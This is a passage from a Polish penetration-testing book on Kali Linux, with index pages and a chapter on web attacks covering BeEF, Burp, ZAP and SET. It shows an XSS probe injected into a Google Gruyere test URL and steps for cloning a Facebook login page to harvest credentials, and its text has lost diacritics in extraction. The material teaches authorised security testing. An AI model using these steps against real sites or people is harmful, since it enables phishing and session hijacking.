biometryczne 194stron internetowych 246

skanowanieadresoacutew URL 93agresywne 79celoacutew 35hostoacutew 162podatno ci na ataki 30 32portoacutew 93witryny 255z wykorzystaniem protoko u

ICMP 70Skipfish 95

raport 97s owniki 96

skryptyopakowuj ce 228wykrywanie

nieautoryzowanychskryptoacutew 287

XSS 224 226SLE 31Slowloris 261s owa kluczowe

dbs 222FUZZ 133 135tables 222

sniffer 267Sniffing and Spoofing 48SniffJoke 267Social Engineer Toolkit 149social engineering 16 148SOW 319spodziewana jednorazowa strata

31sqlmap 221SSL stripping 140SSLstrip 140 197 211

konfigurowanieprzekierowania portoacutew 142

mechanizm dzia ania 284obrona przed atakiem 284rozpocz cie ataku 141

SSO 194

standardy 28 304status testu 24 27STIG 274strategia ataku 36Stress Testing 48strony WWW 241suma kontrolna 293

baza 298sygnatury plikoacutew 299SYSKEY 171System services 48systemy

BeEF 59EDGAR 57IDS 93 269IPS 269NGIPS 236roacutewnowa enia obci enia

i filtrowania zawarto ci 286SCADA 60SIEM 270z kartami dost pu 194zabezpiecze 231

szablony witryn 251szare pude ko 24szyfrowane po czenia

https 197VPN 282

Ttablice t czowe 170 189

amanie hase systemuWindows 183

Tamper Data 125TCPReplay 270Tenable 163testowanie

dzia ania roacute nych urz dzesieciowych 270

mechanizmoacutew obronnych 273odporno ci na przeci enia

268podatno ci na ataki XSS 224sklonowanego rodowiska

279testy

o nieograniczonym zakresiedzia ania 26

odporno ci na przeci eniesystemu 256

warunkoacutew skrajnych 256

testy penetracyjne 21a skanowanie podatno ci 32aplikacji internetowych 23bezpiecze stwo zasoboacutew 32cele 22 255etapy 24 34okre lenie poziomu

zabezpiecze 307pomy lno 33przeprowadzanie 32 33socjotechniczne 149w asnego rodowiska 272 273z wykorzystaniem systemu

Kali Linux 34zakres prac 25 26zewn trzne 321zgoda w a ciciela 33

THX-SSL-DOS 257tokeny 194

sesji 197transfery stref 71 73triada CIA 30tryb nas uchiwania 207 215ttl 259

Uumowy

oczekiwania klienta 317potencjalne problemy

i zagadnienia 324rozliczane wed ug zu ycia

czasu i zasoboacutew 305wykaz prac 319ze sta cen 304

unattended installation 39Unicast RPF 285urlsnarf 227usermap_script 116us ugi

NAT 251profesjonalne 304w chmurze 211

usuwanie ladoacutew w amania 38utrzymanie zdobytego

przyczoacute ka 37uwierzytelnianie 193

ataki s ownikowe 228dodatkowe rozwi zania 194dwusk adnikowe 283pojedyncze 194u ytkownikoacutew 193wielosk adnikowe 193

Kup książkę Poleć książkę

Skorowidz

336

VVega 101

modu serwera proxy 104zestawienie znalezionych

podatno ci 104Volume Based Attacks 256Vulnerability Analysis 35 46vulnerability assessment 32

Ww3af 120

wykorzystanie znalezionychpodatno ci i lukw zabezpieczeniach 122

w3mir 281warto

ryzyka 32sumy kontrolnej 293zasobu 31

WayBack Machine 54Web Applications 47Web Developer 199WebCopier 281Webshag 92

obs uga programu 93raport 95

WebSlayer 131atak na dania HTTP 134generator adunkoacutew 132

Websploit 112weryfikacja po cze HTTPS 281white-box 25 30Windows 171

ataki typu offline 171lista kont u ytkownikoacutew 181montowanie dyskoacutew 172odczytywanie i zapisywanie

plikoacutew 172partycja systemu 172uzyskanie dost pu do

systemu 180Windows Reverse_TCP

Meterpreter 154Wireless Attacks 47Wireshark 206

filtrowanie 208wirtualne rodowisko testowe 279wska nik ekspozycji 31wstrzykiwanie

ciasteczek 198kodu 248

kodu SQL 218pakietoacutew 228skryptoacutew 223

wtyczki przegl darki Firefox 198wykaz prac

dodatkowe elementy 323dodatkowe uzgodnienia

prawne 323koszty us ug 323lista narz dzi 324metodologia testoacutew 323oczekiwania

i odpowiedzialno 323szczegoacute owy 319uwierzytelnianie 324zewn trzne testy

penetracyjne 321wykorzystywanie

b doacutew w zabezpieczeniachprzegl darki 196

exploitoacutew 92luk w zabezpieczeniach 113

254systemoacutew poczty

elektronicznej 123zidentyfikowanych

podatno ci 36 254wymogi bezpiecze stwa 273wyszukiwanie

luk w zabezpieczeniach 92 221metadanych 83podatno ci 29 35 92

wytyczne 28 304

XXSS 223

aplikacje internetowe 248testowanie podatno ci 224

XSS cookie stealing 225

Zzabezpieczanie

serweroacutew aplikacjiinternetowych 249

systemoacutew pod czonychdo internetu 271

zakres prac 319cel testu 33definicja

przestrzeni celoacutew 27systemoacutew 26

zdobycia flagi 28dokument 25identyfikacja obszaroacutew

krytycznych 27materia y i raporty 33metody testowania 26narz dzia 27oprogramowanie 27osoby powiadomione o

planowanym te cie 27pocz tkowy status testu 27ramy czasowe testu 26 308reakcja na proacuteby

prze amywaniazabezpiecze 27

rekomendacjepowykonawcze 28

specyfikacja raportuko cowego 28

ZAP 236 245obrona przed zdalnymi

atakami 249Zaproxy 105zarz dzanie

aktualizacjami 275poprawkami zabezpiecze

275serwerem pakietu 233sesjami 195wersjami dokumentoacutew 308

zasoby sieciowe odpornona przeci enie 263

zatarcie ladoacutew penetracji systemu38

zaufanie 59 148zbieranie odciskoacutew systemu 51zdobycie flagi 28Zenmap 77 82 125

Host details 81Zero-day 275zewn trzny dysk USB 292zmienne

LHOST 118RHOST 117

znaczniki czasu 172zrzut okna 327

daniaForm 131mapowanie 24

Kup książkę Poleć książkę

Page 12: Tytuł oryginału: Web Penetration Testing with Kali Linuxpdf.helion.pl/kalili/kalili.pdf · Uruchamianie systemu Kali Linux z no nika zewnÚtrznego 39 Instalowanie systemu Kali Linux

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

235

Widoczny na poprzednim rysunku host ktoacuterego przegl darka zosta a przechwycona to lap-top pracuj cy pod kontrol systemu Windows BeEF potrafi odkry bardzo wiele szczegoacute oacutewna temat przechwyconego systemu na przyk ad to czy ofiara u ywa przegl darki Firefox czyhost pracuje pod kontrol 32- czy 64-bitowego systemu operacyjnego jakie dodatkowewtyczki zosta y zainstalowane w przegl darce czy obs uga skryptoacutew i apletoacutew Java jest w -czona itp Na skompromitowanych systemach napastnik mo e zdalnie wykonywa roacute ne po-lecenia w cza sygna d wi kowy przechwytywa ciasteczka sesji tworzy zrzuty ekranuprzechwytywa wszystkie znaki wpisywane z klawiatury a nawet wykorzystywa przechwy-con przegl dark jako serwer proxy do atakowania innych systemoacutew Przyk adem zastoso-wania pakietu mo e by sytuacja w ktoacuterej u ytkownik skompromitowanego systemu logujesi do serwisu takiego jak Facebook Napastnik dzi ki pakietowi BeEF mo e przechwyciciasteczko takiej sesji a nast pnie u y go w swojej przegl darce do przechwycenia sesjiu ytkownika i uzyskania dzi ki temu pe nego dost pu do konta Facebook ofiary Nietrudnosobie wyobrazi e w takiej sytuacji z o liwe i destrukcyjne mo liwo ci napastnika s prak-tycznie nieograniczone Raz uchwycony przyczoacute ek daje nieograniczony dost p do przegl -darki ofiary i jej sesji

BeEF dostarcza napastnikowi szczegoacute owych informacji na temat zaatakowanego systemu i logujewszystkie wykonywane w nim polecenia Informacje o zaatakowanym systemie oraz dziennikwykonanych polece mog by bez problemu skopiowane i wklejone do raportu ko cowego

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

236

Obrona przed atakami dokonywanymi z u yciem narz dzi penetracyjnych opartych na prze-gl darkach jest bardzo trudna Najlepszym rozwi zaniem jest oczywi cie zadbanie o to aby zaw-sze korzysta z najnowszej wersji przegl darki z zainstalowanymi najnowszymi pakietami aktuali-zacji oraz z wy czon mo liwo ci uruchamiania apletoacutew Java czy animacji Flash Oproacutecztego dodatkow warstw zabezpiecze mog zapewni rozwi zania pozwalaj ce na wykrywanienajcz ciej spotykanych zagro e takie jak system NGIPS (ang Next Generation IntrusionPrevention System) Znacz c wi kszo ofiar atakoacutew przeprowadzonych z wykorzystaniemnarz dzi takich jak BeEF stanowi u ytkownicy ktoacuterzy klikn li specjalnie przygotowane czezamieszczone w wiadomo ci poczty elektronicznej lub udost pnione w popularnych serwi-sach spo eczno ciowych przez napastnika podaj cego si za kogo innego godnego zaufania

FoxyProxy mdash wtyczka przegl darki Firefox

Je eli masz przegl dark Firefox i chcesz u ywa serweroacutew proxy takich jak ZAP mdash Zed At-tack Proxy czy BURP do testowania aplikacji internetowych to mo esz skorzysta z wtyczkiFoxyProxy ktoacutera znakomicie upraszcza proces prze czania oraz w czania i wy czania po-szczegoacutelnych serweroacutew proxy Inaczej moacutewi c FoxyProxy to wtyczka przegl darki Firefoxpozwalaj ca na atwe zarz dzanie serwerami proxy modyfikacj ich ustawie oraz ich w -czanie i wy czanie Wtyczk FoxyProxy mo esz pobra z sieciowego repozytorium rozsze-rze programy Firefox

Gdy zainstalujesz wtyczk na pasku narz dzi w goacuternej cz ci g oacutewnego okna przegl darkipojawi si ikona FoxyProxy Kiedy j klikniesz lewym przyciskiem myszy wy wietli si oknoopcji i ustawie wtyczki

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

237

Aby doda nowy serwer proxy do wtyczki FoxyProxy powiniene wykona polecenia przed-stawione poni ej

1 Kliknij przycisk Add New Proxy Na ekranie pojawi si nowe okno dialogowe 2 Wybierz opcj Manual Proxy Configuration 3 Wpisz adres IP lub nazw serwera proxy oraz podaj numer jego portukomunikacyjnego

4 Kliknij przycisk OK aby zapisa ustawienia nowego serwera

W tym momencie wtyczka FoxyProxy jest jeszcze wy czona co oznacza e ca y ruch sieciowygenerowany przez przegl dark odbywa si bez po rednictwa serwera proxy (w polu SelectMode jest ustawiona opcja Completely disable FoxyProxy) Aby u y wybranego serwera proxyrozwi list Select Mode i wybierz z niej dan opcj Jak wida dzi ki takiemu rozwi zaniumo esz szybko prze cza przegl dark na roacute ne serwery proxy lub ca kowicie wy czymo liwo korzystania z serwera proxy

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

238

BURP Proxy

BURP Proxy to narz dzie ktoacutere przechwytuje ruch HTTP oraz HTTPS co pozwala pentesterowina badanie funkcjonowania aplikacji internetowych wyszukiwanie luk w ich zabezpieczeniachoraz analizowanie ruchu sieciowego generowanego mi dzy serwerem aplikacji a klientemPakiet BURP Proxy cieszy si ogromn popularno ci nie tylko ze wzgl du na zdolno prze-prowadzania analizy ruchu sieciowego ale roacutewnie a mo e przede wszystkim ze wzgl du namo liwo modyfikacji i retransmitowania przesy anych da bdquow locierdquo Za chwil wyja nimy jakwykorzysta pakiet BURP Proxy do modyfikowania da i wykradania danych uwierzytel-niaj cych u ytkownikoacutew

Pami taj e BURP Proxy to narz dzie wchodz ce w sk ad rozbudowanego pakietu narz dzio nazwie Burp Suite Kiedy u ytkownik wpisuje na pasku adresu swojej przegl darki wybranyadres URL taki jak na przyk ad httpwwwDrChaoscom oczekuje e zostanie przeniesionyna tak stron Serwer proxy przechwytuje takie danie i przesy a je do serwera niejakobdquow imieniurdquo danego klienta Serwery proxy s zazwyczaj wykorzystywane do monitorowania ge-nerowanego ruchu sieciowego oraz ochrony klientoacutew przed potencjalnie szkodliwymi danymi(np witrynami ze z o liwym oprogramowaniem czy witrynami zainfekowanymi) Jako pente-ster mo esz wykorzystywa serwery proxy do przechwytywania ruchu sieciowego wysy anegoprzez klienta a nast pnie kopiowania modyfikowania i retransmitowania jego da

Aby w systemie Kali Linux uruchomi program BURP Suite w menu g oacutewnym przejd do grupyKali Linux a nast pnie wybierz polecenie SniffingSpoofingWeb Sniffersburpsuite

Na ekranie pojawi si g oacutewne okno pakietu Burp Suite

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

239

Aby skonfigurowa serwer proxy przejd na kart Proxy Jak atwo zauwa y opcja przechwyty-wania ruchu sieciowego jest domy lnie w czona (Intercept is on) Kiedy jest w czona BURPProxy zatrzymuje wszystkie dania wysy ane z przegl darki klienta do serwera WWW dzi kiczemu pentester ma mo liwo pe nej analizy takiego po czenia Po zako czeniu przegl da-nia pentester mo e r cznie zezwoli na kontynuowanie po czenia

Opcj Intercept musisz wy czy r cznie w przeciwnym wypadku wszystkie dania wysy ane przezklienta b d przechwytywane i zatrzymywane na poziomie BURP Proxy

Kolejne opcje konfiguracyjne na ktoacutere musisz zwroacuteci uwag s umieszczone na karcieOptions Znajdziesz tutaj opcje pozwalaj ce na sprawdzenie lub zmian domy lnego portukomunikacyjnego wykorzystywanego przez BURP Proxy czy skonfigurowanie interfejsu sie-ciowego wykorzystywanego przez pakiet Domy lnie serwer BURP Proxy jest skonfigurowa-ny do pracy na interfejsie p tli zwrotnej jak przedstawiono na rysunku zamieszczonym poni ejInterfejs p tli zwrotnej to specjalny rodzaj interfejsu sieciowego reprezentuj cy komputer lokal-ny do ktoacuterego przypisany jest zazwyczaj adres IP 127001 Interfejs p tli zwrotnej nie jestpowi zany z adnym urz dzeniem fizycznym i jest stosowany po to aby korzystaj c z po -czenia sieciowego system operacyjny Twojego komputera moacuteg si komunikowa sam ze so-b Inaczej moacutewi c je eli chcesz poprzez sie wysy a do siebie wiadomo ci powinieneu y interfejsu p tli zwrotnej Je eli chcesz wykorzystywa pakiet Burp Suite do pracy z innymikomputerami powiniene w konfiguracji pakietu doda odpowiedni interfejs Ethernet orazpoda jego adres IP

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

240

W naszym przyk adzie b dziemy u ywa interfejsu p tli zwrotnej

Kolejnym etapem b dzie skonfigurowanie przegl darki do pracy z pakietem Burp SuitePraktycznie wszystkie przegl darki mo na skonfigurowa w niemal identyczny lub przynajm-niej bardzo zbli ony sposoacuteb Na kolejnym rysunku przedstawiamy konfiguracj serwera proxyw przegl darce Firefox

Gdy zako czysz konfiguracj serwera proxy w przegl darce przejd na dowoln stron WWWna przyk ad wpisuj c dany adres URL w pasku przegl darki (na przyk ad wwwDrChaoscom)Z pewno ci zauwa ysz e nic si nie wydarzy o Dzieje si tak poniewa opcja Intercept

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

241

jak pami tasz jest domy lnie w czona Je eli przyjrzysz si teraz karcie Intercept to przeko-nasz si e zmieni si jej kolor t a co oznacza e przechwycone zosta o nowe danie

Kiedy klikniesz kart Intercept b dziesz moacuteg dok adnie zbada natur przechwyconego -dania Po zako czeniu mo esz klikn przycisk Forward lub Drop co spowoduje odpowied-nio przes anie dalej lub zablokowanie przechwyconego dania

Je eli klikniesz przycisk Forward zobaczysz e przechwycone danie zostaje przekazane dalejdo serwera WWW a serwer odsy a odpowied Co wi cej powiniene roacutewnie zobaczy estrona WWW zosta a za adowana w oknie przegl darki Pami taj jednak e niektoacutere stronyWWW sk adaj si z wielu komponentoacutew i ich za adowanie b dzie wymaga o r cznego prze-kazania wielu da (czyli b dziesz musia wiele razy klika przycisk Forward)

Kolejn ciekaw i u yteczn funkcj pakietu jest Burp Spider czyli robot sieciowy pozwala-j cy na zautomatyzowanie procesu wykrywania i mapowania aplikacji internetowych Zanimb dziesz moacuteg z niego skorzysta musisz najpierw skonfigurowa serwer BURP Proxy dopracy z internetem tak jak to pokazywali my wcze niej Nast pnie w cz modu Burp Spiderktoacutery mo e automatycznie mapowa wszystkie przechwycone dania i wyszukiwa nowepotencjalne cele ataku

Aby u y modu u Burp Spider przejd na kart Spider gdzie zobaczysz domy lne ustawieniakonfiguracyjne robota sieciowego Aby w czy robota kliknij przycisk Spider is paused couruchomi robota i zmieni nazw przycisku na Spider is running (zobacz pierwszy rysunek nanast pnej stronie)

Burp Spider mapuje wszystkie dania przechwycone przez serwer proxy i wy wietla je na karcieTarget Aby zobaczy co zosta o do tej pory przechwycone przejd na kart Target Znajdziesztam list wszystkich przechwyconych przez proxy witryn z ktoacuterymi czy si wybrana przezCiebie witryna podczas adowania Adresy URL wy wietlone w szarym kolorze oznaczaj witrynyktoacuterych nie przegl da e bezpo rednio Adresy URL wyroacute nione czarnym kolorem oznaczajwitryny ktoacutere odwiedzi e bezpo rednio (zobacz drugi rysunek na nast pnej stronie)

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

242

Aby skorzysta z robota sieciowego kliknij wybrany adres URL prawym przyciskiem myszyi z menu podr cznego wybierz polecenie Spider this host

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

243

Je eli teraz przejdziesz na kart Spider to przekonasz si e liczby przetworzonych daw sekcji Spider Status rosn od 0 w goacuter

Gdy Burp napotka jakie formularze poprosi Ci o ich wype nienie lub zignorowanie Je eliwype nisz formularz Burp sprawdzi kolejne strony ktoacutere sta y si dost pne po wype nieniuformularza

Kiedy Spider zako czy dzia anie wroacute na kart Targets i poszukaj strony ktoacuterej adres wybra edla robota sieciowego Kliknij ikon troacutejk ta znajduj c si z lewej strony adresu spowodujeto rozwini cie listy Teraz mo esz zobaczy wyniki dzia ania modu u Spider na pierwszym ry-sunku na nast pnej stronie

Burp wy wietla wszystkie strony i cza ktoacutere znalaz Spider Oproacutecz tego robot przechwytujeroacutewnie g oacutewny katalog hosta style stron internetowych podkatalogi oraz skrypty Java W kolej-nym przyk adzie prezentujemy szereg katalogoacutew przechwyconych z witryny wwwDrchaoscom

Burp pozwala roacutewnie na filtrowanie wynikoacutew Aby skorzysta z tej mo liwo ci kliknij pasekFilter znajduj cy si w goacuternej cz ci okna programu Na ekranie pojawi si rozwijane oknozawieraj ce szereg roacute nych opcji filtrowania (zobacz drugi rysunek na nast pnej stronie)

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

244

Modu Spider pakietu Burp Suite pozwala pentesterowi na sprawdzenie jak dana aplikacja inter-netowa czy strona WWW jest skonfigurowana oraz jakie mo na na niej znale cza i dok dprowadz Dobr analogi funkcjonalno ci tego modu u mo e by sytuacja w ktoacuterej znajdujemysi w pokoju z dziesi tkami drzwi i mo emy od razu w tym samym czasie sprawdzi dok dprowadz ka de z nich

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

245

OWASP-ZAPZAP to proste w u yciu zintegrowane narz dzie penetracyjne przeznaczone do wyszukiwa-nia podatno ci i luk w zabezpieczeniach aplikacji internetowych Jak pami tasz w rozdziale 3 do-konali my kroacutetkiej prezentacji tego narz dzia i jego mo liwo ci w zakresie skanowania witryninternetowych pod k tem potencjalnych s abych stron zabezpiecze Powroacutecimy teraz dopracy z tym narz dziem i poka emy jak mo na u y programu ZAP do identyfikacji i wykorzy-stywania luk pozwalaj cych na przeprowadzanie atakoacutew typu cross-site scripting (atakoacutew XSS)

ZAP jest pakietem preinstalowanym w systemie Kali Linux 10 Aby go uruchomi w menug oacutewnym przejd do grupy Kali Linux i nast pnie wybierz polecenie SniffingSpoofingWebSniffersowasp-zap Zamiast tego mo esz po prostu otworzy nowe okno terminala i wpisapolecenie zap tak jak to zosta o zaprezentowane na rysunku poni ej

Przedstawiamy kroacutetki opis sposobu konfiguracji pakietu ZAP do pracy z przegl dark Firefoxpodobnie jak to mia o miejsce w rozdziale 3

1 Zaakceptuj postanowienia licencyjne 2 Wygeneruj nowy certyfikat SSL lub zaimportuj certyfikat istniej cy 3 Zaimportuj certyfikat do przegl darki Aby to zrobi w przegl darce Firefoxwybierz z menu polecenie PreferencesAdvanced i nast pnie przejd na kartEncryption

4 Kliknij przycisk View Certificates i zaimportuj certyfikat 5 Zaznacz wszystkie opcje zaufania zwi zane z u ywaniem nowego certyfikatu 6 Skonfiguruj przegl dark do pracy z serwerem proxy pakietu ZAP Aby to zrobiw przegl darce Firefox wybierz z menu polecenie PreferencesAdvanced i nast pnieprzejd na kart Network

7 Jako nazw serwera proxy wpisz localhost i ustaw go do pracy na porcie 8080ktoacutery jest domy lnym portem komunikacyjnym serwera proxy pakietu ZAP

8 Zaznacz opcj pozwalaj c na u ywanie serwera proxy dla wszystkich protoko oacutewkomunikacyjnych

Pami taj e zanim b dziesz moacuteg u ywa pakietu ZAP musisz wygenerowa odpowiedni certyfikat SSL

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

246

Po zako czeniu konfigurowania pakietu ZAP oraz przegl darki Firefox mo esz przej na dowol-nie wybran stron internetow Przekonasz si e nazwy odwiedzanych witryn pojawiaj si nakarcie Sites w oknie pakietu ZAP W naszym przyk adzie przeszli my na stron wwwDrChaoscomi przekonali my si e lista odwiedzonych stron jest dosy poka na Dzieje si tak dlatego estrona DrChaos aduje takie czy inne elementy pochodz ce z tych stron

ZAP jest wyposa ony zaroacutewno w aktywne jak i pasywne skanery stron internetowych Skane-ry pasywne nie przeprowadzaj adnych atakoacutew i s bezpieczne dla wszystkich aplikacji in-ternetowych Z kolei skanery aktywne mog przeprowadza ca e serie roacute nych atakoacutew i do-konuj proacuteb uruchamiania roacute nych skryptoacutew w aplikacjach i na stronach internetowych como e prowadzi do wygenerowania alarmoacutew przez systemy zabezpieczaj ce atakowanych ho-stoacutew i aplikacji

W kolejnym przyk adzie b dziemy wykorzystywa oba rodzaje skaneroacutew aktywne i pasywneZ oczywistych wzgl doacutew dobrze by by o gdyby dysponowa swoim serwerem testowym naktoacuterym moacuteg by przeprowadza takie testy poniewa zdecydowanie odradzamy przeprowadzanieatakoacutew za pomoc pakietu ZAP na innym serwerze bez autoryzacji i zgody jego w a cicielaPoniewa testy podatno ci chcemy przeprowadzi na serwerze do ktoacuterego testowania mamyodpowiedni autoryzacj na nasze potrzeby ponownie wykorzystamy znany Ci ju projektGoogle Gruyere

Firma Google uruchomi a projekt Gruyere w celu umo liwienia testowania luk w zabezpie-czeniach i mechanizmoacutew obronnych aplikacji internetowych Strony internetowe projektuGruyere maj kilka specjalnie przygotowanych luk w zabezpieczeniach w cznie z podatno-ciami na ataki XSS Z projektu Gruyere mo esz korzysta interaktywnie w sieci lub mo esz

pobra go na swoacutej komputer lokalny

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

247

Utwoacuterz swoj w asn instancj projektu Gruyere na ktoacuterej b dziesz pracowa z pakietem ZAP Poutworzeniu instancji projektu otrzymasz swoacutej w asny unikatowy adres URL W naszym przypad-ku adres URL projektu wygl da nast puj co httpgoogle-gruyereappspotcom326352883334

Powroacutecimy teraz do pakietu ZAP i wykonamy szybkie skanowanie tego adresu URL

Na powy szym rysunku wida szereg plikoacutew SEED w cznie z plikiem ktoacuterego adres URI wy-gl da bardzo interesuj co httpgoogle-gruyereappspotcom326352883334invalid

Kiedy umie cimy adres tego pliku w przegl darce otrzymamy nast puj cy komunikat o b dzie

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

248

Kiedy zabieramy si do przeprowadzania atakoacutew XSS warto pami ta e z ich punktu widzenianajbardziej bdquoniebezpiecznymirdquo znakami s znak mniejszo ci lt oraz znak wi kszo ci gt Je eli hakerpotrafi zmusi aplikacj internetow do wstawienia kodu na stron bezpo rednio za pomocznakoacutew lt i gt to zazwyczaj otwiera to szeroko drzwi do wstrzykni cia z o liwych skryptoacutew do apli-kacji Poni ej przedstawiamy jeszcze inne przyk ady interesuj cych plikoacutew SEED

Poni ej przedstawiamy przyk ad wykorzystania jednego z adresoacutew plikoacutew SEED do wstrzykni -cia kodu Aby to zrobi utworzymy adres URL i dodamy do niego skrypt alert(1) co pozwolinam przekona si czy po uruchomieniu na stronie internetowej pojawi si wyskakuj ce oknoz komunikatem o wyst pieniu b du (zobacz rysunek na nast pnej stronie)

httpgoogle-gruyereappspotcom326352883334ltscriptgtalert(1)ltscriptgt

Powy szy przyk ad pokazuje e atakowana aplikacja internetowa wy wietli a na ekranie wyska-kuj ce okno z komunikatem o wyst pieniu b du dowodz c w ten sposoacuteb e jest podatna nataki atak Teraz mo emy u y pakietu ZAP do powtoacuterzenia tego ataku wyproacutebowania innegoataku lub przetestowania podobnych metod wykorzystuj cych luki w zabezpieczeniach XSS

W takich sytuacjach zawsze zalecamy samodzielne poeksperymentowanie z otrzymywanymikomunikatami o b dach tak aby sprawdzi czy nie da oby si ich wykorzysta do bdquozmusze-niardquo aplikacji do ujawnienia cennych dla pentestera informacji Projekt Gruyere jest znako-mitym poligonem do wiadczalnym dzi ki ktoacuteremu mo esz testowa i rozwija swoje umie-j tno ci oraz nabiera do wiadczenia w pracy z pakietem ZAP

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

249

Je eli chcesz sprawdzi mo liwo ci swojej obrony przed zdalnymi atakami to ZAP roacutewniemo e si tutaj sprawdzi znakomicie zw aszcza w przypadku atakoacutew takich jak XSS Niektoacuterzyu ytkownicy wierz e podczas przegl dania zasoboacutew internetu nie musz si przejmowalukami w zabezpieczeniach XSS je eli zgodnie z informacjami producenta ich przegl darkaposiada mechanizmy obrony przed takimi atakami Niestety prawda jest taka e zabezpieczeniaprzegl darki nie mog by uwa ane za doskona e ze wzgl du na prosty fakt e przegl darkanie jest w stanie oszacowa na ile bezpieczny jest kod aplikacji internetowej ktoacuterej ona jestklientem Do wiadczeni hakerzy mog by w stanie obej takie zabezpieczenia i umie ci w ko-dzie strony skrypty przeznaczone do atakowania przegl darek odwiedzaj cych dan witryn Z tego powodu najlepszym sposobem zabezpieczania zaroacutewno serweroacutew aplikacji interneto-wych jak i korzystaj cych z nich klientoacutew jest wyszukiwanie identyfikowanie i usuwanie lukw zabezpieczeniach Mo na tego dokona za pomoc narz dzi takich jak ZAP

Przechwytywanie hase mdash pakiet SETW rozdziale 4 omoacutewili my pokroacutetce podstawowe mo liwo ci pakietu SET (ang Social Engi-neer Toolkit) W tym podrozdziale powroacutecimy do tego pakietu i skoncentrujemy si na zagad-nieniach zwi zanych z wykorzystywaniem go do gromadzenia hase dost pu oraz przechwy-tywania innych poufnych informacji

Jak pami tasz aby uruchomi pakiet SET powiniene w g oacutewnym menu systemu przej do gru-py Kali Linux a nast pnie wybra polecenie Exploitation ToolsSocial Engineering Toolsse-toolkit

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

250

Przed pierwszym uruchomieniem pakietu upewnij si e dokona e jego aktualizacji do najnow-szej wersji Szczegoacute ow instrukcj jak krok po kroku przeprowadzi aktualizacj pakietu SETznajdziesz w rozdziale 4

Kiedy pakiet SET zako czy klonowanie wybranej witryny internetowej mo e j uruchomi na w asnymserwerze WWW Bardzo wa nym elementem ataku jest przekonanie u ytkownika b d cego celem abypo czy si z kopi witryny dzia aj c na Twoim w asnym serwerze Oznacza to e do atakoacutew na celew internecie b dziesz musia u y maszyny posiadaj cej publiczny adres IP Oproacutecz tego b dziesz musiautworzy odpowiednie regu y dla zapory sieciowej tak aby zdalni u ytkownicy mogli si po czy z ze-wn trz z Twoim serwerem

Po zako czeniu konfiguracji ustawie adresoacutew IP i regu zapory sieciowej nadszed czas nauruchomienie pakietu SET

Tym razem pakietu SET b dziemy u ywa do przechwytywania i zbierania hase dost pu Jakpami tasz SET posiada mechanizmy pozwalaj ce na sklonowanie praktycznie dowolnie wybranejwitryny internetowej W naszym przyk adzie wykorzystamy pakiet SET do sklonowania witrynyjednego z najpopularniejszych serwisoacutew spo eczno ciowych Po uruchomieniu pakietu musisz za-akceptowa wszystkie warunki umowy licencyjnej tak jak zaprezentowano na rysunku na na-st pnej stronie

Po uruchomieniu pakietu SET warto od czasu do czasu wybra z menu g oacutewnego opcj 5) Update theSocial-Engineer Toolkit ktoacutera sprawdzi czy korzystasz z najnowszej wersji pakietu Je eli oka e si enie zostan zainstalowane odpowiednie aktualizacje Je eli po wybraniu tej opcji wy wietli si komuni-kat o b dzie informuj cy e repozytoria GIT nie istniej to prawdopodobnie pakiet GIT nie jest zainstalowa-ny lub zosta zainstalowany niepoprawnie (zawsze istnieje roacutewnie ryzyko e co si zmieni o w ca ejprocedurze od czasu kiedy powstawa a ta ksi ka) Wi cej szczegoacute owych informacji i wskazoacutewek na tematu ytkowania pakietu SET w systemie Kali Linux znajdziesz na blogach autoroacutew ksi ki Amira Lakhaniego(zobacz stron httpwwwDrChaoscom) lub Josepha Muniza (zobacz stron httpwwwthesecurity

bloggercom)

Kup książkę Poleć książkę

Rozdzia 6 bull Ataki na aplikacje internetowe i serwery WWW

251

1 Gdy zako czy si aktualizacja pakietu SET do najnowszej wersji z menu g oacutewnegowybierz opcj 1) Social-Engineering Attacks

2 Teraz wybierz opcj 2) Website Attack Vectors 3 Wybierz opcj 3) Credential Harvester Attack Method

Do wyboru masz teraz kilka opcji okre laj cych sposoacuteb klonowania wybranej witryny PakietSET posiada swoje w asne wbudowane szablony dla popularnych witryn takich jak Facebookczy Gmail Czasami u ycie szablonu nie jest najlepszym rozwi zaniem aczkolwiek na pocz tekpowinno w zupe no ci wystarczy Je eli zamiast szablonu chcesz u y kopii wybranej witry-ny internetowej musisz poda jej adres URL mdash pakiet SET rozpocznie proces klonowania

Je eli posiadasz ju wykonan wcze niej kopi witryny lub samodzielnie utworzy e odpowiedniepliki HTML mo esz wybra opcj 3) Custom Import Po wybraniu tej opcji b dziesz moacutegwskaza lokalizacj plikoacutew HTML ktoacuterych chcesz u y

W naszym przyk adzie u yjemy gotowych szablonoacutew witryn internetowych Pakiet SET poprosio podanie adresu IP na ktoacuterym b dzie nas uchiwa nadchodz cych da mdash w tym przypadkub dzie to adres IP interfejsu sieciowego naszego systemu Kali Linux Wyj tkiem od tej regu ymo e by sytuacja kiedy wykorzystujesz us ug NAT zapory sieciowej W takim przypadkuzamiast lokalnego adresu IP systemu Kali Linux powiniene u y publicznego adresu IP hostaus ugi NAT tak aby klienty z zewn trz mog y czy si z Twoim systemem W naszym przy-k adzie u yjemy adresu IP interfejsu p tli zwrotnej 127001

Kup książkę Poleć książkę

Kali Linux Testy penetracyjne

252

Kiedy zdefiniujesz adres IP pakiet SET poprosi Ci o wybranie szablonu W naszym przy-padku wybierzemy opcj Facebook

